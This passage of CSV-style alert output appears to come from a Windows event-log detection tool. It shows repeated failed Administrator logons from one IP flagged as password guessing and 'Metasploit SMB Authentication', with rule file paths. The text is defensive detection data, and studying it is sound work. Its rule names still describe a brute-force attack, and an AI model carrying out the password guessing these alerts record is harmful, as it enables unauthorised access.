Password,User: Administrator : Type: 3 : Workstation: 7ohqvCoOLkFRcqvE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: me8rikVJqcKxvHdq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLqVmqCmHTrD7V8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ySdyzxvDasHgjq0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N2auwOc1wemq76n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgK6lHgC5WOBk4kW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2GG0bKgusKqseQij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpHm7DcOmhq4rkaX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OX1vVGrE7fJSMEiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65i7wtyAhL58QrzC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: k8uSVFRTLTB6g1eg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ire6VOUMWZQnNjES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGWnvKUXnbJvRqql : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBVvrrLf1rnAviKS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NE9atGNBlSLQLLcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a0M5EaAXziu07hOH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PM1mwxqI7yVgoK2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPqnpvetHXdThxYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gthbVQMJ7UD2QS7H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwwJXCoC3gMDoDn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ilNNoVbZpyhtsNkV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eNY0lv9IglfHP34d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjSeQciwy17L7raV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wycE1fIsmPq9zaMU : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5z1spxImm2ZlGOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dg7o4GCET1bJrlEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E7Db3OLA0XPXL1B4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uoqx5iPRp2tfYYos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ixw5XWC2frtrTUkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3v0NpzAp7io9gbZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: AfOOiR2zO5xem9Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yiGtitRqZbGNKrtN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oQ70LvSMnGxBCFO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGHr8623vHZyMY5B : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X5Y1C9A4XqxQGoVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SOnirLGOZzRVSt3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jLu7XtYCHPqVNE7u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w242Ei1CpWErEE4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UOZUagVG4R6zcK92 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hQOl8XV3Ydp8UcW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: u1XBRDfoN0I2iu6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngyknhk7uGvs38bG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXZUhLVsfRUBDcsu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VEDAtkhiSqUcLj2i : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4CmH02M91kHzeK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5St1kWrKP4PZlOIy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17A6k4Om84gunQfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
